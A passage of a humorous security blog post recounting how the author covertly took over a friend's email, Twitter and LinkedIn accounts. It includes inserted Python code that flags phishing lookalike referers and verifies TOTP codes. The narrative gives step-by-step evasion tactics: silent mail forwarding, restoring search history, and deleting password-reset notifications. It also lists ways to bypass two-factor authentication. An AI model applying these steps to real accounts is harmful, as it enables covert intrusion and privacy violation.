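SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2017:13:39:43 +1000] "GET /DIANA?wertyu2 HTTP/1.1" 404 4702 '
    '"https://docs-login-alive.aerobatic.io/?passive=1209600'
    '&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount" "Mozilla/5.0 (iPhone)"',
    '203.0.113.7 - - [12/May/2017:13:41:02 +1000] "GET /favicon.ico HTTP/1.1" 200 318 '
    '"https://accounts.live.com/ManageAccount" "Mozilla/5.0 (iPhone)"',
]

# Assumption for this example: the only hostnames where a Microsoft account password
# should ever be typed. The post itself only shows accounts.live.com, and only inside
# the decoy "continue=" parameter.
LEGIT_LOGIN_HOSTS = {"login.live.com", "accounts.live.com"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def classify_login_url(url, allowlist):
    """Judge a URL by the host it really points at, not by hosts named in its query."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    # A legit hostname smuggled into a query parameter is what a skimming eye latches
    # on to; it says nothing about where the password form is actually submitted.
    embedded = []
    for values in parse_qs(parts.query).values():
        for value in values:
            inner = (urlsplit(value).hostname or "").lower()
            if inner in allowlist:
                embedded.append(inner)
    # Crude heuristic: a non-allowlisted host that borrows login-ish vocabulary.
    lookalike = host not in allowlist and any(t in host for t in ("login", "live"))
    return {"host": host, "host_allowed": host in allowlist,
            "embedded_allowed_hosts": embedded, "lookalike": lookalike}


def parse_log_line(line):
    """Parse one Combined Log Format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["method"], _, rest = entry["request"].partition(" ")
    entry["path"] = rest.rpartition(" ")[0]          # drop the trailing "HTTP/1.1"
    # Whatever follows "?" lands in the server log verbatim, which is exactly how the
    # post's form ended up with typed passwords in its access log.
    entry["query"] = entry["path"].partition("?")[2]
    return entry


def flag_lookalike_referers(lines, allowlist):
    """Return parsed entries whose referer is a lookalike of an allowlisted login host."""
    flagged = []
    for line in lines:
        entry = parse_log_line(line)
        if entry and entry["referer"]:
            verdict = classify_login_url(entry["referer"], allowlist)
            if verdict["lookalike"]:
                flagged.append({**entry, "verdict": verdict})
    return flagged
```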
Anyway sorry back to haͅck͐i̥n̏g̜
Part 4: HACKER VOICE I'M IN
I immediately try Diana's email password (wertyu2) on her Facebook, Twitter, LinkedIn, iCloud, and on her other email addresses. None of them work because I've chosen someone with slightly above average personal security to target.
The obvious next step is to forward all her email to me (so I don't have to keep logging in to her email). Before I set up email forwarding, I try it out on a Hotmail account I control. I'm testing to see if setting up "forward all your email to this address" sets off any notifications I'll have to delete, or notifies you in any other way.
In Gmail, when you forward all your mail to another email address, the other address gets emailed a code, and also a big red bar appears on your Gmail inbox saying "you're sending literally all of your email to this address FYI" for 7 days.
I type my email address into my test Hotmail account, and click "forward all my mail here pls". It saves. I check both email inboxes for a notification email. There isn't one. I've just backdoored this email account and no fuss has been made whatsoever. Oh well at least Hotmail has NoMansSkyDrive 2.8 Remastered 40 Online or whatever.
An interlude from Diana
Diana replies to my email saying she doesn't know this person either. She's a little suspicious, so I try and say something that will close the conversation.
Diana doesn't reply.
Hey remember how you can search email?
Now that I have Diana's email password, I want to search her email for more passwords, and use those passwords to get more, and so on, like a Real hacker.
Try going to your email and searching for "password". Betcha there's passwords in there.
In Hotmail, when you go to search something, the last 5 searches you've done pop up as suggestions.
This means that if I search for "password", Diana will notice "password" in the search history. That would be a really lame way to get caught.
To get around this, I:
- Wait until Diana is asleep
- Write down her last 5 searches
- Search for "password"
- Look at the results
- Search for her last 5 searches again, in reverse order
Since only the last 5 searches are shown, by repeating the searches in reverse order, the search history looks exactly the same.
Much to the disappointment of the live studio audience, I don't find anything particularly useful. I find the 2 passwords I already know (qwerty1 and wertyu2) several times, and one other password which I again try on all her accounts, but doesn't work </3.
I hang out in Diana's email for several months. Every so often I check it. I notice her signing a contract for a job, so I get her passport number, signature, phone number, bank account number, and basically everything I'd need to impersonate her. I don't really[23][24][25] want to impersonate someone's government-issued ID, so I leave this alone.
At one stage, I'm browsing through hit political discourse platform and opinion conveyor belt twitter dot com, and I notice Diana tweet something along the lines of "Finally spent my day off consolidating my 4 email accounts into one, feels good to be organised".
I panic a little. Have I been found out? I log in to dianalastname@hotmail.com (which still works, thankfully) and see that all her emails have been archived. I poke around in the email forwarding settings, and I see that things have changed. Her email is no longer being sent to my email address, it's being sent to dianalastname42@gmail.com (presumably the new email that Diana now forwards all her mail to).
This raises an important question. How did Diana not notice my email address in the "forward all mail to:" box? Did she see it, and just mindlessly delete it?
(When I interview her after all this, she says yep, that's exactly what she did.)
What now?
Normally it would end here. Mission accomplished. I'm in control of her email. I could cause catastrophic damage to Diana's life if I wanted to (I don't btw). There's potential for endless gags, limitless goofs, unlimited japes, infinite jests, etc.
But.. it seems like an awful shame to just… leave. That's why I start work on a lil' somethin' called
Operation Luigi
Everybody just LOVES Mario's green friend Luigi! He's a Certified Good Boy! Just look at that boyish charm.
Why not brighten up YOUR social media presence with this game boy?
Well gee I'm sold after that delightful interlude from our sponsor, The Nintendo. Let's get Diana some uncut, Colombian Luigi.
Step 1: Get in to her Twitter and LinkedIn
So, I want to:
- Get access to Diana's Twitter
- Not lock Diana out
- Not alert Diana that I'm up in her stuff
I could just phish her again for these passwords, but I'm already a salty old fisherman by this point.
Since I have access to her email, I could reset her Twitter password. The problem is, when you reset your Twitter password, you get logged out of Twitter in Chrome, the Twitter app, and anywhere else you might be logged in. So you have to retype your new password. One of my rules was that I wouldn't interrupt Diana's life, so I need her to be able to log back in to Twitter when I force her to log out.
I come up with a simple 8-step plan to do this, with 4 easy repayments of 2 steps.
- Wait until Diana is asleep
- Disable Diana's email forwarding
- Go to Twitter and reset her password
- Click the password reset link that gets emailed to her
- Set her password to qwerty1
- Delete the password reset email
- Delete the "New Twitter Sign In" email
- Re-enable email forwarding
The combo move in this is setting her password to qwerty1. When I phished her email password, she tried to log in to her email with qwerty1 even though that's not her password. This tells me that she thinks her password for everything is qwerty1, or at least, that's what she'll try if she's not sure. The technical term for this is next-level mindgames💻💻💻.
I do the steps above, and I'm now logged in to Diana's Twitter account. I tighten up her Twitter security settings because I'm a Good Boy. I hope that Diana will be able to log back in too, and not wonder why she suddenly got logged out. I wait stressfully for her to tweet something, and after a day or so she retweets a cute doggo, so we're good to go.
Now I want to do the same thing on popular dating website LinkedIn. This will involve signing Diana out of LinkedIn on all her devices, and I don't want her to get too suspicious, so I wait a week. I do the same process as with Twitter. This time I don't even wait until Diana is asleep, because I'm young and invincible.
As I'm setting Diana's password on LinkedIn back to qwerty1, LinkedIn doesn't let me.
Is this because qwerty1 was a password present in the LinkedIn hack in 2012? Or because it's just a common password? For a brief moment I panic, but then I realise I can just set Diana's password to her email password, wertyu2.
Astute readers will have noticed this little guy in the screenshot above.
LinkedIn is asking me if I'd like to log out of Diana's LinkedIn account on all devices while I'm resetting the password. That's REAL nice of you to offer old mate LinkedIn but I'm absolutely golden as it is in terms of logouts so don't even worry about it I'll be just fine how it is NO REALLY don't trouble yourself, I'm sure your CPU cycles are busy displaying everyone's 6000 word Thinkpieces about "Cyber" for "Non-technical Business Decision Makers".
Yeah so I submit that form 100% checkbox-free, and Diana remains logged in to LinkedIn on all her devices, none the wiser.
Step 2: Bring in the dark-green boys
I enlist the help of a talented friend to photoshop everybody's #1 boy next door Luigi subtly into Diana's profile picture on Twitter, like a green guardian angel.
I can't show you Diana's pictures, so here's me doing similar photoshops to Your Boy And Mine, Five Time Celebrity MasterChef Winner And The Inventor of Bitcoin, Give It Up For Dr. Barack Obama Everybody:
At about this time I tweet about our sweet green boy so that if Diana sees her guardian angel Luigi, she'll know it was me. This is like my calling card except…. well it's not really like a calling card it's pretty dorky to be honest but just LOOK at that wholesome lad, you just KNOW he'd help you fix a flat tyre, and he'd just be too gosh darn polite to correct you if you said "thanks green mario" so really if you think about it I guess it IS like a calling card.
Next up I log into her LinkedIn account, get overwhelmed by her 15 LinkedIn notifications, 7 new profile views, 11 new Key People To Bother, and several pop ups telling me about new features I can use to invite people to join my professional network on LinkedIn™®©. Then I change her profile picture to my really good version.
For about a week, Diana continues her Twitter and LinkedIn(?) usage whilst being silently Luigi'd. Diana goes on viewing what I can only assume to be the sharpest international political discourse on Twitter, and getting slightly more LinkedIn profile views from observant recruiters who are also fans of the hit 2001 ghostbusting game, Luigi's Mansion.
Well that just about wraps up Operation Luigi. Glad that's all done and dusted.
Although…
I'm basically a Luigi technician at this point, and it would be a shame to let all that work go to waste. So let's just do
~one more thing~
Operation Waluigi: A dark turn for mature audiences
Waluigi, true to his character, is much more direct.
Damn right this new profile strength is "Advanced."
Please enjoy these half-baked opsec-enabled[26] tweets[27].
I also make Diana follow a bunch of Waluigi fan accounts (there are a lot), Nintendo of America, and @EmojiAquarium because it's a damn good account.
Office 5: Epilogue
Diana likes her new Waluigi life so much she keeps it all up there, and even changes her Facebook photo to a Waluigi'd one.
I meet up with her and ask her about her side of the story a few days afterwards.
Here are some choice quotes:
"I've since listened to a lot of Waluigi songs"
"Waluigi is the ultimate symbol of postmodernism, he exists only as a foil"
I ask her "How do you think I did it?". She says I must have hacked her email and reset her Twitter password, but she has no idea how I hacked her email.
When I show her the email chain with Kathleen on my computer her jaw drops for several seconds.
"You catfished me!"
We go back to the same ramen place after the interview. The credits roll.
"wait but i am very afraid after reading this blog post, how do I not get 360 noscope hacked like diana tho"
Hey kids, it's me, "Alex". We've had a lot of fun today, but now it's time to talk about the real issues. The moral of this story is that it's really easy for someone else to know your password. Fret not, for you are young and extremely online, and it's not too late for you yet.
Step 1: Go to https://haveibeenpwned.com and type in your email address. This doesn't actually do anything, it's just to instill sufficient fear in you.
Step 2[28]: Go to your email and enable "Two-step Authentication". You can go to https://www.google.com.au/landing/2step if you use Gmail. If you use Hotmail then I dunno, there's probably like a SkyCloud 360 X LIVE subscription you can purchase that lets you do it.
Now, as well as your email password, you also type in a code from an app on your phone. Or you can have the code SMSed to you on your pastel-pink flip phone if you wanna relive the 90s[29].
If Diana had Verified Good Content Two-step Authentication turned on, then I would have had to get a two-factor code AND her password. I would have had to either:
- Phish the code as well as the password (but the code expires in less than 60 seconds)
- Physically go to the same place as her, connect to the same WiFi, and steal her browser session
- Email her a Word Doc with a macro in it that gives me control of her laptop, and steal her browser cookies from it
- Call up her phone provider and trick them into pointing her phone number at my SIM card
All of these are more work and higher risk, so hackers often just move on to lower hanging fruit. That's you in this situation. You're the delicious fruit. And the hackers are…. giraffes? Yeah. Watch out for giraffes.
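To show why the first option is so time-constrained, here is an added example (not the post's code) of how an authenticator-app code is generated and checked: RFC 6238 TOTP with a one-step clock-drift window, so a code captured by a phisher is rejected a couple of steps later. The secret is the RFC 6238 test-vector value, and the 30-second step and 6-digit settings are assumptions matching a typical authenticator app.

```python
import hashlib
import hmac
import struct

STEP_SECONDS = 30   # assumed time step, as used by common authenticator apps
DIGITS = 6          # assumed code length

# Constructed shared secret: the RFC 6238 test-vector secret (ASCII "12345678901234567890").
DEMO_SECRET = b"12345678901234567890"


def hotp(secret: bytes, counter: int, digits: int = DIGITS) -> str:
    """HOTP (RFC 4226): dynamically truncate HMAC-SHA1(secret, counter) to a decimal code."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    binary = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(binary % (10 ** digits)).zfill(digits)


def totp(secret: bytes, unix_time: int, step: int = STEP_SECONDS) -> str:
    """TOTP (RFC 6238): HOTP over the current time step number."""
    return hotp(secret, int(unix_time) // step)


def verify_totp(secret: bytes, code: str, unix_time: int,
                step: int = STEP_SECONDS, skew: int = 1) -> bool:
    """Accept a code for the current step and `skew` steps either side (clock drift).

    With skew=1 the code stays valid for at most about 90 seconds after it was
    generated, so a phished code that is not replayed immediately is useless.
    """
    current = int(unix_time) // step
    return any(
        hmac.compare_digest(hotp(secret, c), code)
        for c in range(current - skew, current + skew + 1)
    )
```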
Freshly baked shoutouts to My Absolute Homeslices for being my blog-review senpais, Diana for being chill, and to the hacking software released at DEFCON 25: Aerobatic dot io
If you want to talk to me about this, hit me up in the tweet zone (@mangopdf) or direct your browser to mango.pdf.zone
Source: https://defaultnamehere.tumblr.com/post/163734466355/operation-luigi-how-i-hacked-my-friend-without